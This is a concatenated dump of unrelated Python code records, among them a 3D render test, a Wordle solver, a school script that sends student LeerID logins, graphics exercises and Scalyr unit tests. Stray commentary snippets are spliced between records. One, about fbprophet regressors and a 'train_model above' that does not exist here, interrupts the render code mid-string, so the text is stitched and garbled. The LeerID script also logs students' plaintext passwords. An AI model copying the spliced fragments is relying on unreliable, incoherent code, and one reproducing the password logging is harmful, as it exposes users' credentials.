AiNodeSetFlt(self.camera, \"fov\", 45.0)\n\n def createLights(self):\n \"\"\"\n Create light\n \"\"\"\n \n self.light = AiNode(\"point_light\")\n AiNodeSetStr(self.light, \"name\", \"light_01\")\n\n #Light position\n AiNodeSetVec(self.light, \"position\", 0.0, 15.0, 45.0)\n AiNodeSetFlt(self.light, \"exposure\", 2.0)\n AiNodeSetFlt(self.light, \"intensity\", 8.0)\n\n def render_settings(self):\n \"\"\"\n Set render settings\n \"\"\"\n ops = AiUniverseGetOptions()\n AiNodeSetInt(ops, \"AA_samples\", 8)\n AiNodeSetInt(ops, \"xres\", 512)\n AiNodeSetInt(ops, \"yres\", 384)\n AiNodeSetInt(ops, \"GI_diffuse_depth\", 4)\n\n # create an output driver node\n driver = AiNode(\"driver_jpeg\")\n AiNodeSetStr(driver, \"name\", \"_driver\")\n AiNodeSetStr(driver, \"filename\", self.image_path)\n AiNodeSetFlt(driver, \"gamma\", 2.2)\n\n # create a gaussian filter node\n filter = AiNode(\"gaussian_filter\")\n AiNodeSetStr(filter, \"name\", \"_filter\")\n\n # assign the 
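
train_model above wires extra DataFrame columns in as Prophet regressors; a hedged sketch of that flow on synthetic data (the phos column name is made up, and the call order that matters is add_regressor() before fit()):

import pandas as pd
import fbprophet

df = pd.DataFrame({
    "ds": pd.date_range("2018-01-01", periods=24, freq="M"),
    "y": range(24),
    "phos": [2 * x for x in range(24)],
})
model = fbprophet.Prophet(weekly_seasonality=False, daily_seasonality=False,
                          yearly_seasonality=False)
model.add_regressor("phos")
model.fit(df)  # regressor columns must also be present in any future frame
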
driver and filter to the main (beauty) AOV,\n # which is called \"RGBA\" and is of type RGBA\n outs_ = AiArrayAllocate(1, 1, AI_TYPE_STRING)\n AiArraySetStr(outs_, 0, \"RGBA RGBA _filter _driver\")\n AiNodeSetArray(ops, \"outputs\", outs_)\n\n def run(self):\n # Begin arnold process\n AiBegin()\n\n #Connecting log \n AiMsgSetLogFileName(self.log)\n AiMsgSetConsoleFlags(AI_LOG_ALL)\n\n self.createSphere()\n self.createCamera()\n self.createLights()\n self.render_settings()\n\n AiRender(AI_RENDER_MODE_CAMERA)\n\n # End arnold process\n AiEnd()\n self.renderSignal.emit()\n\n def setColor(self, r, g, b):\n self.r = r * 255\n self.g = g * 255\n self.b = b * 255\n\n","repo_name":"fidelm02/CS_TestsDec","sub_path":"app_PyQtArnold_RenderTest/Core/app_PyQtArnold_core.py","file_name":"app_PyQtArnold_core.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12085918382","text":"from wordle import Wordle, Correct_Code\nimport random\n\n\n# Naive solution\nclass Wordle_Solver:\n\n\tdef __init__(self, wordle, allowed_guesses):\n\t\tself.wordle = wordle\n\t\tself.allowed_guesses = allowed_guesses\n\t\tself.allowed_guesses_original = allowed_guesses\n\n\tdef reset(self):\n\t\tself.allowed_guesses = self.allowed_guesses_original\n\n\tdef solve(self, goal_word = None):\n\t\tif goal_word:\n\t\t\tself.wordle.set_goal_word(goal_word)\n\t\telse:\n\t\t\tself.wordle.choose_goal_word()\n\t\t\n\t\tresult = None\n\t\tprev_word = None\n\t\tCORRECT_RESULT = [ Correct_Code.GREEN for i in range(5) ]\n\t\ttries = 0\n\n\t\twhile not result == CORRECT_RESULT:\n\t\t\tword = self.make_guess(result, prev_word)\n\t\t\ttries += 1\n\n\t\t\tresult = self.wordle.get_guess_results(word)\n\t\t\tprev_word = word\n\n\t\tself.reset()\n\n\t\treturn tries\n\n\n\tdef filter_words(results, guess, word_list):\n\t\t\tgreens = {}\n\t\t\tyellows = {}\n\t\t\tgreys = {}\n\n\t\t\tfor idx, corr_code in enumerate(results):\n\t\t\t\tif corr_code == Correct_Code.GREEN:\n\t\t\t\t\tgreens[idx] = guess[idx]\n\t\t\t\telif corr_code == Correct_Code.YELLOW:\n\t\t\t\t\tyellows[idx] = guess[idx]\n\t\t\t\telif corr_code == Correct_Code.GREY:\n\t\t\t\t\tgreys[idx] = guess[idx]\n\n\t\t\tdef filter_guess(word):\n\t\t\t\tif word == guess:\n\t\t\t\t\treturn False\n\n\t\t\t\tfor idx, el in greens.items():\n\t\t\t\t\tif word[idx] != guess[idx]:\n\t\t\t\t\t\treturn False\n\n\t\t\t\tfor idx, el in yellows.items():\n\t\t\t\t\t# TODO this doesn't deal with two yellows for the same letter. 
As long as the letter appears once, the word will not be filtered.\n\t\t\t\t\tif not guess[idx] in word:\n\t\t\t\t\t\treturn False\n\n\t\t\t\tfor idx, el in greys.items():\n\t\t\t\t\tif word[idx] == guess[idx]:\n\t\t\t\t\t\treturn False \n\n\t\t\t\t\tif (not guess[idx] in yellows.values() and not guess[idx] in greens.values()) and guess[idx] in word:\n\t\t\t\t\t\treturn False\n\t\t\t\t\n\t\t\t\treturn True\n\n\t\t\treturn list(filter(filter_guess, word_list))\n\n\n\tdef make_guess(self, prev_result = None, prev_guess = None):\n\t\tif prev_result and prev_guess:\n\t\t\tself.allowed_guesses = Wordle_Solver.filter_words(prev_result, prev_guess, self.allowed_guesses)\n\n\t\treturn random.choice(self.allowed_guesses)\n\n\nclass Wordle_Solver_2:\n\n\tdef __init__(self, wordle, allowed_guesses):\n\t\tself.wordle = wordle\n\t\tself.allowed_guesses = allowed_guesses\n\t\tself.allowed_final_guesses = allowed_guesses\n\t\tself.allowed_guesses_original = allowed_guesses\n\t\t# do I do set up here?\n\t\t# What do I set up?\n\t\t# rank words by entropy\n\t\t#\t\t- given a word, how much does the list reduce by on average over any kind of result it gives\n\n\tdef train(self):\n\n\t\t# TODO: add more possible results\n\t\tpossible_results = [ \n\t\t\t[ Correct_Code.GREY for i in range(5) ], \n\t\t\t[ Correct_Code.GREEN for i in range(5) ], \n\t\t\t[ Correct_Code.YELLOW for i in range(5) ] \n\t\t] # TODO: every permutation of a result\n\n\t\tword_scores = []\n\n\t\t# TODO: see if it is possible to choose words from outside allowed_guesses that help reduce search space\n\t\t# Along the same vein see if the filtering for words is done as smartly as it can be.\n\t\tfor word in self.allowed_guesses:\n\n\t\t\ttotal_remaining = 0\n\n\t\t\tfor result in possible_results:\n\t\t\t\tfiltered_word_list = Wordle_Solver.filter_words(result, word, self.allowed_guesses)\n\t\t\t\ttotal_remaining += len(filtered_word_list)\n\t\t\t\n\t\t\tword_scores.append((word, total_remaining))\n\n\n\t\tword_scores.sort(key=(lambda el: el[1]))\n\n\t\tself.allowed_guesses = list(map(lambda el: el[0], word_scores))\n\n\tdef reset(self):\n\t\tself.allowed_guesses = self.allowed_guesses_original\n\n\n\t# NOTE: this is just a duplicate of the solve() func on Wordle_Solver, maybe think about how to remove this duplication\n\tdef solve(self, goal_word = None):\n\t\tif goal_word:\n\t\t\tself.wordle.set_goal_word(goal_word)\n\t\telse:\n\t\t\tself.wordle.choose_goal_word()\n\t\t\n\t\tresult = None\n\t\tprev_word = None\n\t\tCORRECT_RESULT = [ Correct_Code.GREEN for i in range(5) ]\n\t\ttries = 0\n\n\t\twhile not result == CORRECT_RESULT:\n\t\t\tword = self.make_guess(result, prev_word)\n\t\t\ttries += 1\n\n\t\t\tresult = self.wordle.get_guess_results(word)\n\t\t\tprev_word = word\n\n\t\tself.reset()\n\n\t\treturn tries\n\n\n\tdef make_guess(self, prev_result = None, prev_guess = None):\n\t\tif prev_result and prev_guess:\n\t\t\tself.allowed_guesses = Wordle_Solver.filter_words(prev_result, prev_guess, self.allowed_guesses)\n\n\t\tself.train()\n\n\t\treturn self.allowed_guesses[0]\n\t\t","repo_name":"adi-p/wordle-clone","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4651153815","text":"import pandas as pd\nimport requests, datetime, configparser, re\nfrom zeep import Client\nimport logging, logging.handlers, os, sys\n\n# V0.1: first version\n# V0.2: bugfix: stamboeknummer is unique per 
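
On the TODO in Wordle_Solver.filter_words above about repeated yellow letters: the usual fix is to compare letter counts rather than plain membership. A hedged, standalone sketch that is not wired into the class:

from collections import Counter

def satisfies_yellow_counts(word, yellow_letters):
    # yellow_letters may contain repeats, e.g. ["l", "l"]
    need = Counter(yellow_letters)
    have = Counter(word)
    return all(have[ch] >= n for ch, n in need.items())

print(satisfies_yellow_counts("allow", ["l", "l"]))  # True: two l's present
print(satisfies_yellow_counts("alone", ["l", "l"]))  # False: only one l
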
instelling\n\nversion = \"0.2\"\n\nstamnummer_cache = {}\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\nlog = logging.getLogger(\"leerid\")\nLOG_FILENAME = os.path.join(sys.path[0], f'log/leerid.txt')\nlog_level = getattr(logging, 'INFO')\nlog.setLevel(log_level)\nlog_handler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=1024 * 1024, backupCount=20)\nlog_formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(name)s - %(message)s')\nlog_handler.setFormatter(log_formatter)\nlog.addHandler(log_handler)\n\nlog.info(\"START leerid\")\n\ndryrun = config[\"test\"][\"DRYRUN\"] == \"true\"\nss_send_to = config[\"test\"][\"SS_MESSAGE_RECEIVER_ID\"] if dryrun else \"\"\n\ndef get_leerlinggegevens_from_sdh():\n print(\"-> Lees gegevens van school-data-hub\")\n global stamnummer_cache\n response = requests.get(config[\"default\"][\"SDH_API_URL\"], headers={\"x-api-key\": config[\"default\"][\"SDH_API_KEY\"]})\n response_json = response.json()\n if response_json[\"status\"]:\n stamnummer_cache = {leerling[\"instellingsnummer\"]+leerling[\"stamboeknummer\"]: {\"instellingsnummer\": int(leerling[\"instellingsnummer\"]),\n \"leerlingnummer\": int(leerling[\"leerlingnummer\"]),\n \"klascode\": leerling[\"klascode\"]} for leerling in response_json[\"data\"]}\n print(\"--> SDH: gegevens zijn ok\")\n log.info(\"Reading from SDH is OK\")\n return True\n print(f\"--> SDH: foutmelding: {response_json['data']}\")\n log.error(f\"Reading from SDH is NOK, {response_json['data']}\")\n return False\n\n\ndef create_class_list():\n admingroep_cache = {}\n print(\"-> Maak een klassenlijst aan\")\n if not get_leerlinggegevens_from_sdh():\n return False\n try:\n leerid_naam = input(\"--> LeerID invoer bestand: \")\n instellingsnummer = input(\"--> Instellingsnummer: \")\n df = pd.read_excel(leerid_naam)\n for i, row in df.iterrows():\n stamnummer = row[\"Stamnummer\"]\n admingroep = row[\"Administratieve groep\"]\n key = instellingsnummer + str(stamnummer)\n if key in stamnummer_cache:\n klascode = stamnummer_cache[key][\"klascode\"]\n if admingroep not in admingroep_cache:\n admingroep_cache[admingroep] = set()\n admingroep_cache[admingroep].add(klascode)\n klaslijst = sorted([f\"{', '.join( sorted(list(v)))} ({k})\" for k, v in admingroep_cache.items()])\n with open(f\"klassenlijst-{instellingsnummer}-{ datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.txt\", \"w\") as klaslijst_file:\n klaslijst_file.write(\"# is commentaar, deze lijn wordt niet ingelezen.\\n\")\n klaslijst_file.write(\"# Om klassen te selecteren, verwijder de # aan het begin\\n\")\n klaslijst_file.write(\"# Na het verzenden wordt de lijn aangepast, bvb:\\n\")\n klaslijst_file.write(\"##1A (1e lj A) - 2023-04-01\\n\\n\")\n klaslijst_file.write(\"###### START LIJST ######\\n\\n\")\n for klas in klaslijst:\n klaslijst_file.write(f\"#{klas}\\n\")\n print(\"-> Klassenlijst is klaar\\n\")\n log.info(f\"Klassenlijst is ready, LeerID invoer {leerid_naam}, instellingsnummer {instellingsnummer}\")\n return True\n except Exception as e:\n print(e)\n log.error(f\"Could not create klassenlijst, {e}\")\n return False\n\n\ndef send_leerid_to_students():\n print(\"-> Start met verzenden\")\n if not get_leerlinggegevens_from_sdh():\n return False\n admingroup_lijst = []\n new_klaslijst = []\n now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')\n try:\n leerid_naam = input(\"--> Leerid invoer bestand: \")\n klaslijst_naam = input(\"--> Klassenlijst: \")\n instellingsnummer = input(\"--> Instellingsnummer: \")\n 
with open(klaslijst_naam, \"r\") as klaslijst_file:\n for line in klaslijst_file:\n line = line.strip(\"\\n\")\n found = re.search(\"\\(.*\\)\", line)\n if found and line.strip()[0] != \"#\":\n admingroup = found[0][1:-1]\n admingroup_lijst.append(admingroup)\n line = f\"##{line} - {now}\"\n new_klaslijst.append(line)\n soap = Client(config[\"default\"][\"SS_API_URL\"])\n api_key = config[\"default\"][\"SS_API_KEY\"]\n send_from = config[\"default\"][\"SS_MESSAGE_SENDER_ID\"]\n body_html = open(\"message-body.html\").read()\n subject_text = open(\"message-subject.txt\").read()\n df = pd.read_excel(leerid_naam)\n for i, row in df.iterrows():\n admingroep = row[\"Administratieve groep\"]\n if admingroep in admingroup_lijst:\n send_to = ss_send_to if dryrun else stamnummer_cache[instellingsnummer + str(row[\"Stamnummer\"])][\"leerlingnummer\"]\n body = body_html.replace(\"%%FIRSTNAME%%\", row[\"Voornaam\"])\n body = body.replace(\"%%USERNAME%%\", row[\"LeerID Gebruikersnaam\"])\n body = body.replace(\"%%PASSWORD%%\", row[\"LeerID Wachtwoord\"])\n print(f\"--> {row['Achternaam']} {row['Voornaam']} krijgt login {row['LeerID Gebruikersnaam']}, verzonden naar {send_to}\")\n ret = soap.service.sendMsg (api_key, send_to, subject_text, body, send_from, \"\", 0, False)\n print(\"Send returned:\", ret)\n log.info(f\"SensMsg, to {send_to}/{row['Achternaam']} {row['Voornaam']}, from {send_from}, username {row['LeerID Gebruikersnaam']}, password {row['LeerID Wachtwoord']}\")\n\n print(\"-> LeerID gegevens zijn verzonden\")\n log.info(\"SendMsg Done\")\n with open(klaslijst_naam, \"w\") as klaslijst_file:\n for l in new_klaslijst:\n klaslijst_file.write(f\"{l}\\n\")\n return True\n except Exception as e:\n print(e)\n log.error(f\"Could not send credentials, {e}\")\n return False\n\n\ndef show_info():\n print(f\"\"\"\n Versie: {version}\n Zorg dat je een excel hebt met de LeerID gegevens.\n Vanuit die excel kan je een klassenlijst genereren (zie menu).\n Pas die klassenlijst aan en selecteer de klassen waar je de LeerID gegevens naartoe wilt sturen.\n Zorg dat je een html-bestand hebt (messa-body.html) met de inhoud van het bericht dat je wilt sturen.\n Zorg dat je een tekst-bestand hebt (message-subject) met het onderwerp van het bericht dat je wilt sturen.\n Verzend de LeerID gegevens naar de geselecteerde klassen (zie menu).\n \"\"\")\n return True\n\nmenu_data = [\n [\"Info\", show_info],\n [\"Maak klassenlijst aan\", create_class_list],\n [\"Verzend LeerID gegevens naar de leerlingen\", send_leerid_to_students],\n [\"Stop\", None]\n]\n\nwhile True:\n for i, item in enumerate(menu_data):\n print(f\"{i + 1}> {item[0]}\")\n i += 1\n inp = input(f\"Maak uw keuze (1-{i}): \")\n choice = int(inp)\n if choice >= 1 and choice < i:\n if not menu_data[choice - 1][1]():\n break\n if choice == i:\n break","repo_name":"manuelborowski/leerid","sub_path":"leerid.py","file_name":"leerid.py","file_ext":"py","file_size_in_byte":7271,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36060887625","text":"\ndef combine(n, k):\n result = []\n num = [i for i in range(1, n+1)]\n stack = []\n def tracking(nums, length):\n if len(stack) == length:\n result.append(list(stack))\n return\n for index, i in enumerate(nums):\n stack.append(i)\n temp = list(nums[index + 1:])\n tracking(temp, length)\n stack.pop()\n tracking(num, k)\n return result\n\n\nif __name__ == \"__main__\":\n n = 3\n k = 2\n print(combine(n, 
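
The class-list parser in send_leerid_to_students above extracts the administrative group from lines like "1A (1e lj A)" with a parenthesised re.search; that step in isolation:

import re

line = "1A (1e lj A)"
found = re.search(r"\(.*\)", line)
if found and line.strip()[0] != "#":
    admingroup = found[0][1:-1]  # strip the surrounding parentheses
    print(admingroup)            # -> 1e lj A
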
k))\n\n","repo_name":"ficherfisher/leetcode","sub_path":"77Combinations.py","file_name":"77Combinations.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"37934313847","text":"import xml.etree.ElementTree as ET\n\ndata = ET.Element('chess')\n\nelement1 = ET.SubElement(data, 'Opening')\n\ns_elem1 = ET.SubElement(element1, 'E4')\ns_elem2 = ET.SubElement(element1, 'D4')\n\ns_elem1.set('type','Accepted')\ns_elem2.set('type', 'Declined')\n\ns_elem1.text = \"King's Gambit Accepted\"\ns_elem2.text = \"Queen's Gambit Declined\"\n\nb_xml = ET.tostring(data)\n\nwith open(\"GFG.xml\",\"wb\") as f:\n f.write(b_xml)","repo_name":"Tue811/readfileHTMLandXML","sub_path":"xml.py","file_name":"xml.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72735281107","text":"import pandas as pd\r\nimport re\r\n\r\nsortie = open(\"sortieSentimentPolarite.txt\", \"w\")\r\nfile = \"train.xml\"\r\npolariteFile=\"polariteSentiment.txt\"\r\npolarite = open(polariteFile, \"r\")\r\nlines = polarite.readlines()\r\npolarite_dict = {line.rsplit('\"',maxsplit=4)[1].strip('\"'): (line.rsplit(';',maxsplit=4)[2], line.rsplit(';',maxsplit=4)[3], line.rsplit(';',maxsplit=4)[4].strip()) for line in lines}\r\ndata = pd.read_xml(file)\r\ncommentaires = data['commentaire'] # comments\r\n\r\n \r\nfor i, commentaire in enumerate(commentaires): # loop over each comment\r\n print(\"coms\",i)\r\n if commentaire is None: # if the comment is empty\r\n sortie.write(\"\\n\") # then write nothing to the output file\r\n elif commentaire is not None: # if the comment is not empty\r\n commentaire_mots = commentaire.split()\r\n cpt = 0\r\n moy_positif = 0\r\n moy_negatif = 0\r\n moy_neutre = 0\r\n for mot in commentaire_mots: # loop over each word of the comment\r\n if mot in polarite_dict:\r\n cpt += 1\r\n # print(\"test\",polarite_dict[mot])\r\n p = int(polarite_dict[mot][0]) \r\n ne = int(polarite_dict[mot][1]) \r\n n = int(polarite_dict[mot][2]) \r\n S = sum((p, ne, n))\r\n p = p / S \r\n ne = ne / S\r\n n = n / S\r\n moy_positif += p\r\n moy_negatif += n\r\n moy_neutre += ne\r\n if cpt == 0: # if no word of the comment is found among the polarity words\r\n sortie.write(\"\\n\")\r\n else: # otherwise add the average positive, negative and neutral score of each word\r\n moy_positif_final = moy_positif / cpt\r\n moy_neutre_final = moy_neutre / cpt\r\n moy_negative_final = moy_negatif / cpt\r\n sortie.write(\"2000001:{:.2f} 2000002:{:.2f} 2000003:{:.2f}\\n\".format(moy_positif_final, moy_neutre_final, moy_negative_final))\r\n\r\nsortie.close()\r\n","repo_name":"ElodieGiry/PredictionNoteDeFilm","sub_path":"testPolarite.py","file_name":"testPolarite.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4030560056","text":"from OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\n\nimport math\n\ndef init(): \n glClearColor(0.0,0.0,0.0,1.0) \n gluOrtho2D(0,100,0,100) \n\n\ndef nonPolarEllipse(xc, yc, xr, yr):\n\n glColor3f(255.0,0.0,0.0)\n glPointSize(5.0)\n glBegin(GL_POINTS)\n\n x = xc-xr\n t = xc+xr\n glVertex2f(x, yc)\n glVertex2f(t, yc)\n\n factor = 500\n increment = 1 / factor\n x += increment\n\n while x < t:\n offset = yr * math.sqrt(1 - (((x-xc)/xr) * ((x-xc)/xr)))\n glVertex2f(x, yc + 
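
A quick numeric check of the non-polar form used in nonPolarEllipse above: for (x - xc)^2/xr^2 + (y - yc)^2/yr^2 = 1, the vertical offset at a given x is yr * sqrt(1 - ((x - xc)/xr)**2):

import math

xc, yc, xr, yr = 0.0, 0.0, 4.0, 2.0
x = 2.0
offset = yr * math.sqrt(1 - ((x - xc) / xr) ** 2)
# the resulting point should satisfy the ellipse equation (prints ~1.0)
print((x - xc) ** 2 / xr ** 2 + offset ** 2 / yr ** 2)
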
offset)\n glVertex2f(x, yc - offset)\n x += increment\n\n glEnd()\n glFlush()\n\ndef polarEllipse(xc, yc, xr, yr):\n\n glColor3f(255.0,0.0,0.0)\n glPointSize(5.0)\n glBegin(GL_POINTS)\n\n theta = 0\n factor = 500\n increment = 1 / factor\n t = math.pi / 2\n\n while (theta <= t):\n\n x = xr * math.cos(theta)\n y = yr * math.sin(theta)\n glVertex2f(x + xc, y + yc)\n glVertex2f(-x + xc, -y + yc)\n glVertex2f(-x + xc, y + yc)\n glVertex2f(x + xc, -y + yc)\n theta += increment\n\n glEnd()\n glFlush()\n\n\n\ndef main():\n print(\"\\nPlot an ellipse\")\n print(\"1. Polar Generation Algorithm\")\n print(\"2. Non-Polar Generation Algorithm\")\n choice = input(\"Enter Choice : \")\n\n while True:\n \n if (int(choice) > 2 or int(choice) < 1):\n print(\"Invalid choice\")\n choice = input(\"Enter Choice : \")\n else:\n break\n\n x = int(input(\"\\nEnter x coordinate of center : \"))\n y = int(input(\"Enter y coordinate of center : \"))\n xr = int(input(\"Enter x-radius : \"))\n yr = int(input(\"Enter y-radius : \"))\n\n if int(choice) == 1:\n\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_RGB)\n glutInitWindowSize(500,500)\n glutInitWindowPosition(0,0)\n glutCreateWindow(\"Polar Ellipse\")\n glutDisplayFunc(lambda: polarEllipse(x,y,xr,yr)) \n init()\n glutMainLoop()\n \n else:\n\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_RGB)\n glutInitWindowSize(500,500)\n glutInitWindowPosition(0,0)\n glutCreateWindow(\"Non Polar Ellipse\")\n glutDisplayFunc(lambda: nonPolarEllipse(x,y,xr,yr))\n init()\n glutMainLoop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"sidhantunnithan/cusat-cse-degree","sub_path":"S5/Computer-Graphics-Lab/exp4.py","file_name":"exp4.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30017299590","text":"import sys; sys.stdin = open('1860.txt')\n\nT = int(input())\nfor tc in range(1, T + 1):\n N, M, K = map(int, input().split())\n arr = list(map(int, input().split()))\n\n arr.sort()\n a = '' # 아래에서 'Impossible'만 찾기 위해서\n cnt = 0 # 빵 개수\n for i in range(arr[-1] + 1):\n\n while i > arr[0] or arr == []:\n cnt -= 1\n arr.pop(0)\n if cnt < 0:\n a = 'Impossible'\n break\n\n if i % M == 0 and i != 0:\n cnt += K\n\n if i == arr[0]:\n if cnt <= 0:\n a = 'Impossible'\n break\n else:\n cnt -= 1\n arr.pop(0)\n\n if arr == [] and cnt >= 0:\n a = 'Possible'\n elif len(arr) != 0:\n if len(arr) > cnt:\n a = 'Impossible'\n elif len(arr) <= cnt:\n a = 'Possible'\n\n print('#{} {}'.format(tc, a))\n\n\n# T = int(input())\n# for tc in range(1, T + 1):\n# N, M, K = map(int, input().split())\n# arr = list(map(int, input().split()))\n#\n# arr.sort()\n#\n# result = 'Possible'\n# for i in range(N):\n# cnt = (arr[i] // M) * K\n# if cnt < i + 1:\n# result = 'Impossible'\n# break\n#\n# print('#{} {}'.format(tc, result))","repo_name":"jijisusu3/algorithm_study_2","sub_path":"이성재/0227/1860_진기최고급붕어빵.py","file_name":"1860_진기최고급붕어빵.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12458028627","text":"from __future__ import unicode_literals\nfrom __future__ import absolute_import\n\n__author__ = \"imron@scalyr.com\"\n\nfrom scalyr_agent.monitor_utils.annotation_config import process_annotations\n\nfrom scalyr_agent.test_base import ScalyrTestCase\n\nimport re\n\n\nclass TestAnnotationConfig(ScalyrTestCase):\n def test_invalid_annotations(self):\n\n annotations = {\n \"some.other.value\": 10,\n 
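
The commented-out alternative at the end of the bakery solution above states the key invariant directly: by time t there are (t // M) * K loaves, and the i-th customer (0-based, arrivals sorted) needs i + 1 loaves baked. A tiny check on made-up values:

M, K = 2, 1                   # one batch of 1 loaf every 2 time units
arrivals = sorted([2, 4, 4])  # three customers
ok = all((t // M) * K >= i + 1 for i, t in enumerate(arrivals))
print("Possible" if ok else "Impossible")  # third customer: only 2 loaves by t=4
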
\"not.a.scalyr.annotation\": \"no it's not\",\n }\n\n result = process_annotations(annotations)\n\n self.assertEquals(0, len(list(result.keys())))\n\n def test_annotation_object(self):\n annotations = {\n \"log.config.scalyr.com/item1\": \"item1\",\n \"log.config.scalyr.com/item2\": \"item2\",\n \"log.config.scalyr.com/item3\": \"item3\",\n }\n\n result = process_annotations(annotations)\n self.assertEquals(3, len(list(result.keys())))\n self.assertEquals(\"item1\", result[\"item1\"])\n self.assertEquals(\"item2\", result[\"item2\"])\n self.assertEquals(\"item3\", result[\"item3\"])\n\n def test_annotation_nested_object(self):\n annotations = {\n \"log.config.scalyr.com/item1.nest1\": \"item1 nest1\",\n \"log.config.scalyr.com/item1.nest2\": \"item1 nest2\",\n \"log.config.scalyr.com/item1.nest3\": \"item1 nest3\",\n \"log.config.scalyr.com/item2.nest1\": \"item2 nest1\",\n \"log.config.scalyr.com/item2.nest2\": \"item2 nest2\",\n \"log.config.scalyr.com/item2.nest3\": \"item2 nest3\",\n \"log.config.scalyr.com/item2.nest4\": \"item2 nest4\",\n }\n\n result = process_annotations(annotations)\n self.assertEquals(2, len(list(result.keys())))\n self.assertEquals(3, len(result[\"item1\"]))\n self.assertEquals(4, len(result[\"item2\"]))\n\n self.assertEquals(\"item1 nest1\", result[\"item1\"][\"nest1\"])\n self.assertEquals(\"item1 nest2\", result[\"item1\"][\"nest2\"])\n self.assertEquals(\"item1 nest3\", result[\"item1\"][\"nest3\"])\n\n self.assertEquals(\"item2 nest1\", result[\"item2\"][\"nest1\"])\n self.assertEquals(\"item2 nest2\", result[\"item2\"][\"nest2\"])\n self.assertEquals(\"item2 nest3\", result[\"item2\"][\"nest3\"])\n self.assertEquals(\"item2 nest4\", result[\"item2\"][\"nest4\"])\n\n def test_annotation_array(self):\n annotations = {\n \"log.config.scalyr.com/item1.20\": \"item1 element 2\",\n \"log.config.scalyr.com/item1.0\": \"item1 element 0\",\n \"log.config.scalyr.com/item1.10\": \"item1 element 1\",\n \"log.config.scalyr.com/item2.0\": \"item2 element 0\",\n \"log.config.scalyr.com/item2.1\": \"item2 element 1\",\n \"log.config.scalyr.com/item2.2\": \"item2 element 2\",\n \"log.config.scalyr.com/item2.3\": \"item2 element 3\",\n }\n\n result = process_annotations(annotations)\n self.assertEquals(2, len(list(result.keys())))\n self.assertEquals(3, len(result[\"item1\"]))\n self.assertEquals(4, len(result[\"item2\"]))\n\n self.assertEquals(\"item1 element 0\", result[\"item1\"][0])\n self.assertEquals(\"item1 element 1\", result[\"item1\"][1])\n self.assertEquals(\"item1 element 2\", result[\"item1\"][2])\n\n self.assertEquals(\"item2 element 0\", result[\"item2\"][0])\n self.assertEquals(\"item2 element 1\", result[\"item2\"][1])\n self.assertEquals(\"item2 element 2\", result[\"item2\"][2])\n self.assertEquals(\"item2 element 3\", result[\"item2\"][3])\n\n def test_annotation_keys_with_hyphens(self):\n annotations = {\n \"com.scalyr.config.log.item1-1.element-1\": \"item1 element 1\",\n \"com.scalyr.config.log.item1-2.element-2\": \"item1 element 2\",\n \"com.scalyr.config.log.item1-3.element-3\": \"item1 element 3\",\n \"com.scalyr.config.log.item2-1.element-1\": \"item2 element 1\",\n \"com.scalyr.config.log.item2-2.element-2\": \"item2 element 2\",\n \"com.scalyr.config.log.item2-3.element-3\": \"item2 element 3\",\n }\n\n result = process_annotations(\n annotations,\n annotation_prefix_re=re.compile(r\"^(com\\.scalyr\\.config\\.log\\.)(.+)\"),\n hyphens_as_underscores=True,\n )\n\n self.assertEquals(\"item1 element 1\", result[\"item1_1\"][\"element_1\"])\n 
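
The tests above exercise process_annotations from scalyr_agent; the behaviour under test, dotted suffixes becoming nested structure and non-matching keys being dropped, can be sketched standalone (one level of nesting only; this is an illustration, not the library's implementation):

def nest(flat, prefix="log.config.scalyr.com/"):
    out = {}
    for key, value in flat.items():
        if not key.startswith(prefix):
            continue  # non-scalyr annotations are ignored
        node, _, rest = key[len(prefix):].partition(".")
        if rest:
            out.setdefault(node, {})[rest] = value
        else:
            out[node] = value
    return out

print(nest({"log.config.scalyr.com/item1.nest1": "v", "other": "x"}))
# -> {'item1': {'nest1': 'v'}}
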
self.assertEquals(\"item1 element 2\", result[\"item1_2\"][\"element_2\"])\n self.assertEquals(\"item1 element 3\", result[\"item1_3\"][\"element_3\"])\n self.assertEquals(\"item2 element 1\", result[\"item2_1\"][\"element_1\"])\n self.assertEquals(\"item2 element 2\", result[\"item2_2\"][\"element_2\"])\n self.assertEquals(\"item2 element 3\", result[\"item2_3\"][\"element_3\"])\n","repo_name":"scalyr/scalyr-agent-2","sub_path":"tests/unit/annotation_config_test.py","file_name":"annotation_config_test.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"48"} +{"seq_id":"71092655507","text":"# Write a program\n# that reads three numbers and \n# shows which one is the largest and which one is the smallest.\n\nnumero1 = int(input('Digite o núm. 01: '))\nnumero2 = int(input('Digite o núm. 02: '))\nnumero3 = int(input('Digite o núm. 03: '))\n\nmenor = numero1\nif numero2 < numero1 and numero2 < numero3:\n menor = numero2\nif numero3 < numero1 and numero3 < numero2 :\n menor = numero3\nmaior = numero1\nif numero2 > numero1 and numero2 > numero3:\n maior = numero2\nif numero3 > numero1 and numero3 > numero2 :\n maior = numero3\n\nprint('O maior é: {}'.format(maior))\nprint('O menor é: 